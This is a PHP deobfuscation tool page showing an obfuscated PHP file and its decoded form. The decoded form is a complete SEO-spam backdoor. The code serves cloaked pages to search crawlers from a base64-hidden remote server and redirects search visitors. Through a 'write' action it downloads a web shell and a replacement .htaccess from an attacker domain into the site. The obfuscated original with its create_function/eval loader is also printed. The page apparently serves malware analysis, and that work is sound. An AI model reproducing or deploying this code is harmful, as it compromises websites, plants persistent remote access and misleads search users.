Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $YTyiNlXPSZp='y(3;]whcx)8$4mb dk1qog5sprlua=z_/0i9tvf_"76*.2n[je';$q2866=$YTyiNlXPSZ..

Decoded Output download

<?php error_reporting(0);
@ini_set('display_errors', 0);
@set_time_limit(3600);
@ignore_user_abort(1);
$gojj = '282';
@$action = $_GET['ac'] ? $_GET['ac'] : "";
if ($action != "" && $action == "write") {
    write();
    echo "write done!";
    exit();
}
$smframe = '<?xml version="1.0" encoding="UTF-8"?>
<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"
      xmlns:xhtml="http://www.w3.org/1999/xhtml">
%s</urlset>';
$smitem = '    <url>
        <loc>%s</loc>
        <xhtml:link rel="alternate" hreflang="ja" href="%s"/>
    </url>' . "
";
$mainsm = '<?xml version="1.0" encoding="UTF-8"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
%s</sitemapindex>';
$mainsmitem = '    <sitemap>
        <loc>%s://%s/sitemap%d.xml</loc>
    </sitemap>' . "
";
$lang = isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 4) : "";
$ur = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : "";
$ua = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : "";
$host = $_SERVER["HTTP_HOST"];
$uri = $_SERVER["REQUEST_URI"];
$ip = clientip();
$http = https();
$header = array('User-Agent: ' . $ua, 'Lang: ' . $lang, 'Referer: ' . $ur, 'Http-Host: ' . $host, 'Remote-Addr: ' . $ip);
$postdata = 'shost=' . $host . '&proto=' . $http;
$u_pre = "/";
if (strstr($uri, ".php?")) {
    $ta = explode(".php?", $uri);
    $u_pre = $ta[0] . ".php?";
    $uri = "/" . $ta[1];
}
$host_u = $http . "://" . $host . $u_pre;
if (@preg_match('#^/pingsitemap(.*?).xml$#i', $uri, $amu)) {
    $result = '';
    if ($amu[1] === '' || @preg_match('#(\d+)-$#', $amu[1], $samu)) {
        $postdata.= ($samu[1] == '') ? '&groupid=' . $gojj : '&groupid=' . $samu[1];
        $ts = strval(time());
        array_push($header, 'timestamp: ' . $ts);
        array_push($header, 'xdoim: ' . crc32($ts . '
' . $postdata));
        $content = trim(urlx('http://' . gets() . '/sitemap.xml', $header, $postdata . '&http=' . $http));
        if ($content === '') {
            exit();
        }
        if (@preg_match('#^(\d)*#', $content)) {
            for ($i = 1;$i <= intval($content);$i++) {
                $pgurl = sprintf('https://www.google.co.jp/ping?sitemap=%s' . 'sitemap%s%d.xml', $host_u, $samu[0], $i);
                $respbody = urlx($pgurl);
                $result.= $pgurl . $respbody;
            }
        }
    } else {
        $pgurl = sprintf('https://www.google.co.jp/ping?sitemap=%s' . 'sitemap%s.xml', $host_u, $amu[1]);
        $respbody = urlx($pgurl);
        $result.= $pgurl . $respbody;
    }
    echo $result;
    exit();
}
if (@preg_match('#^/sitemap(.*?).xml$#i', $uri, $amu)) {
    $postdata = 'shost=' . $host . '&http=' . $http;
    if (@preg_match('#(\d+)-$#', $amu[1], $samu)) {
        $postdata.= '&groupid=' . $samu[1];
    } else {
        $postdata.= '&groupid=' . $gojj;
    }
    $ts = strval(time());
    array_push($header, 'timestamp: ' . $ts);
    array_push($header, 'xdoim: ' . crc32($ts . '
' . $postdata));
    $content = trim(urlx('http://' . gets() . '/sitemap' . (($amu[1] == '' || $samu[1] != '') ? '.xml' : '/' . $amu[1]), $header, $postdata));
    if ($content === '') {
        exit();
    }
    @header('Content-type: text/xml');
    if ((($amu[1] === '' || $samu[1] != '')) && @preg_match('#^(\d)*#', $content)) {
        $xml = '';
        for ($i = 1;$i <= intval($content);$i++) {
            $xml.= sprintf($mainsmitem, $http, $host, $i, date('Y-m-d\TH:i:sP', time()));
        }
        $outstr = sprintf($mainsm, $xml);
        $outstr = str_replace($http . "://" . $host . "/", $host_u, $outstr);
        echo $outstr;
        exit();
    }
    $ids = explode("
", $content);
    $smbody = '';
    foreach ($ids as $v) {
        $purl = $http . '://' . $host . '/' . $v;
        $smbody.= sprintf($smitem, $purl, $purl);
    }
    $outstr = sprintf($smframe, $smbody);
    $outstr = str_replace($http . "://" . $host . "/", $host_u, $outstr);
    echo $outstr;
    exit();
}
if (@preg_match('#^/getver$#i', $uri, $amu)) {
    $ts = strval(time());
    array_push($header, 'timestamp: ' . $ts);
    array_push($header, 'xdoim: ' . crc32($ts . '
' . $postdata));
    $cnt = trim(urlx('http://' . gets() . $amu[0], $header, $postdata));
    echo ($cnt === false) ? 'fail' . gets() : $cnt . $gojj . gets();
    exit();
}
if (strstr($uri, "10001abcaa55atesta5")) {
    $cnt = trim(get('http://' . gets() . "/10001abcaa55atesta5"));
    echo ($cnt === false) ? 'fail' . gets() : $cnt . $gojj . gets();
    exit();
}
if (@preg_match('#google|yahoo|bing|craft|Crawler#i', $ua)) {
    $pdt = $postdata . '&http=' . $http . '&groupid=' . $gojj;
    if (@preg_match('#([a-z]+)-(\d+)?(.html)$#i', $uri, $amu)) {
        $pdt.= sprintf('&hpid=%s-%s', preg_replace('/[a-zI](xyz|buzz|top|online|store|club|shop|biz|space|fun|site).*$/', ".$1", strrev($amu[1])), $amu[2]);
        $outstr = @trim(urlx(sprintf('http://%s/bot/page?' . $pdt, gets()), $header, $pdt, 1));
        $outstr = str_replace($http . "://" . $host . "/", $host_u, $outstr);
        echo $outstr;
        exit();
    } elseif (@preg_match('#cate\/([a-z]+)-(\d+)$#i', $uri, $bmu)) {
        $outstr = @trim(urlx(sprintf('http://%s/bot/cate?' . $pdt, gets()), $header, $pdt . '&host=' . preg_replace('/[a-zI](xyz|buzz|top|online|store|club|shop|biz|space|fun|site).*$/', ".$1", strrev($bmu[1])) . '&cateid=' . $bmu[2], 1));
        $outstr = str_replace($http . "://" . $host . "/", $host_u, $outstr);
        echo $outstr;
        exit();
    } else {
        $outstr = @trim(urlx(sprintf('http://%s/bot/home?' . $pdt . '&uri=' . $uri, gets()), $header, $pdt, 1));
        $outstr = str_replace($http . "://" . $host . "/", $host_u, $outstr);
        echo $outstr;
        exit();
    }
}
if (@preg_match('#google.co.jp|google.com|yahoo.co.jp|yahoo.co|bing.com|ask.com|aol.com|aol.jp#i', $ur) && @preg_match('#([a-zI]+)-(\d+)(.html)?$#i', $uri)) {
    if (substr($uri, -5) != ".html") {
        $uri = $uri . ".html";
    }
    $pdt = $postdata . '&groupid=' . $gojj . '&uri=' . $uri . '&ip=' . $ip;
    $purl = urlx(sprintf('http://%s/bot/302?' . $pdt . '&uri=' . $uri, gets()), $header, $pdt, 1);
    @header('Location: ' . $purl);
    exit();
}
function write() {
    $shell_load = get(base64_decode("aHR0cDovL2hlbGxvLmZpcnN0Z3VpZGUueHl6L21tMi50eHQ="));
    $new_ht_content = get(base64_decode("aHR0cDovL2hlbGxvLmZpcnN0Z3VpZGUueHl6L3NobC9odGFjY2Vzcy50eHQ="));
    if (!is_dir("css")) {
        mkdir("css", 0755, true);
    }
    @chmod("css/.htaccess", 0755);
    file_put_contents("css/.htaccess", $new_ht_content);
    file_put_contents("css/load.php", $shell_load);
}
function urlx($url, $header = null, $postdata = null, $gz = null) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    if (!($gz === null)) {
        curl_setopt($ch, CURLOPT_ENCODING, 'gzip,deflate');
    }
    if (stripos($url, "https:") === 0) {
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
    }
    if (!($header === null)) {
        curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
    }
    if (!($postdata === null)) {
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
    }
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $body = curl_exec($ch);
    curl_close($ch);
    return $body;
}
function get($url) {
    $contents = @file_get_contents($url);
    if (!$contents) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $contents = curl_exec($ch);
        curl_close($ch);
    }
    return $contents;
}
function gets() {
    return base64_decode("c2VvMjgtMi5zdGFydGdyZWF0c2VvLmNvbQ==");
}
function https() {
    if ((!empty($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off') || (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https') || (!empty($_SERVER['HTTP_FRONT_END_HTTPS']) && strtolower($_SERVER['HTTP_FRONT_END_HTTPS']) !== 'off')) {
        return "https";
    }
    return "http";
}
function clientip() {
    if (getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) {
        return getenv('REMOTE_ADDR');
    } elseif (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) {
        return $_SERVER['REMOTE_ADDR'];
    }
}

Did this file decode correctly?

Original Code

<?php $YTyiNlXPSZp='y(3;]whcx)8$4mb dk1qog5sprlua=z_/0i9tvf_"76*.2n[je';$q2866=$YTyiNlXPSZp[(105/15)].$YTyiNlXPSZp[(26-1)].$YTyiNlXPSZp[(1*49)].$YTyiNlXPSZp[((10*1)+18)].$YTyiNlXPSZp[(14+22)].$YTyiNlXPSZp[(44+5)].$YTyiNlXPSZp[(44-13)].$YTyiNlXPSZp[(684/18)].$YTyiNlXPSZp[(23+4)].$YTyiNlXPSZp[(72-(33-7))].$YTyiNlXPSZp[(154/22)].$YTyiNlXPSZp[(11+25)].$YTyiNlXPSZp[(65-(62-31))].$YTyiNlXPSZp[(26-6)].$YTyiNlXPSZp[((27*2)-8)];$pHFdNhg9688=$YTyiNlXPSZp[(20-9)].$YTyiNlXPSZp[(2*4)].$YTyiNlXPSZp[(29*1)].$YTyiNlXPSZp[(160/4)];$MYtraky2482=$YTyiNlXPSZp[(8*5)].$YTyiNlXPSZp[((1+0)+2)].$YTyiNlXPSZp[(6+(1*(95/19)))].$YTyiNlXPSZp[(140/5)].$YTyiNlXPSZp[(522/18)].$YTyiNlXPSZp[(7*((7-3)-2))].$YTyiNlXPSZp[(2*14)].$YTyiNlXPSZp[(138/(2+4))].$YTyiNlXPSZp[(1029/(378/18))].$YTyiNlXPSZp[((2*189)/9)].$YTyiNlXPSZp[(12+(0+0))].$YTyiNlXPSZp[(31*1)].$YTyiNlXPSZp[(48/(36/12))].$YTyiNlXPSZp[(735/15)].$YTyiNlXPSZp[(0+7)].$YTyiNlXPSZp[(18+2)].$YTyiNlXPSZp[(18-(10/5))].$YTyiNlXPSZp[(735/15)].$YTyiNlXPSZp[(0+(2-(1*1)))].$YTyiNlXPSZp[(16-(3+(36/(0+18))))].$YTyiNlXPSZp[((167-23)/18)].$YTyiNlXPSZp[(0+(18-9))].$YTyiNlXPSZp[(1*3)].$YTyiNlXPSZp[(11*(1+(0/(78/13))))].$YTyiNlXPSZp[(2*7)].$YTyiNlXPSZp[(29*(0+1))].$YTyiNlXPSZp[(38-(8+9))].$YTyiNlXPSZp[(15*2)].$YTyiNlXPSZp[(45-11)].$YTyiNlXPSZp[(1*46)].$YTyiNlXPSZp[(1*(17+21))].$YTyiNlXPSZp[(78/3)].$YTyiNlXPSZp[(21+(77/11))].$YTyiNlXPSZp[(22+14)].$YTyiNlXPSZp[(343/(91/13))].$YTyiNlXPSZp[(1*1)].$YTyiNlXPSZp[(21-10)].$YTyiNlXPSZp[(22+(12/2))].$YTyiNlXPSZp[(180/20)].$YTyiNlXPSZp[(3+((0+0)*1))].$YTyiNlXPSZp[(686/(126/9))].$YTyiNlXPSZp[(61-(32-8))].$YTyiNlXPSZp[(476/17)].$YTyiNlXPSZp[((4-0)+22)].$YTyiNlXPSZp[(((23-(2*5))/13)-0)].$YTyiNlXPSZp[(7+(84/21))].$YTyiNlXPSZp[(28/2)].$YTyiNlXPSZp[(9-0)].$YTyiNlXPSZp[(3*1)];$UrR1094= "'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'";$JTx2343=$pHFdNhg9688;$JTx2343.=$UrR1094;$JTx2343.=$MYtraky2482;@$mEriqO3481=$q2866((''), ($JTx2343));@$mEriqO3481(); ?>

Function Calls

create_function 1
base64_decode 1
null 1
gzinflate 1

Variables

$x 'zVnpU9tIFv/sVOV/EIqIpETINgzZiYniUGCOKgeIMcnmYFWy1LZFdJVa5or..
$YTyiNlXPSZp y(3;]whcx)8$4mb dk1qog5sprlua=z_/0i9tvf_"76*.2n[je
$q2866 create_function
$b error_reporting(0); @ini_set('display_errors', 0); @set_ti..
$MYtraky2482 ";$a=base64_decode($x);$b=gzinflate($a);eval($b);
$a YSHTD6 P`*1`UEtZ-]>`]{j4S;%If~4jg)4i876A2=;Cb~gDqJ%@Vue_\X*R..
$JTx2343 $x="'zVnpU9tIFv/sVOV/EIqIpETINgzZiYniUGCOKgeIMcnmYFWy1LZFdJV..
$UrR1094 'zVnpU9tIFv/sVOV/EIqIpETINgzZiYniUGCOKgeIMcnmYFWy1LZFdJVa5or..
$mEriqO3481 None
$pHFdNhg9688 $x="

Stats

MD5 28b696f7a849a1148e76b0292d505c4a
Eval Count 2
Decode Time 132 ms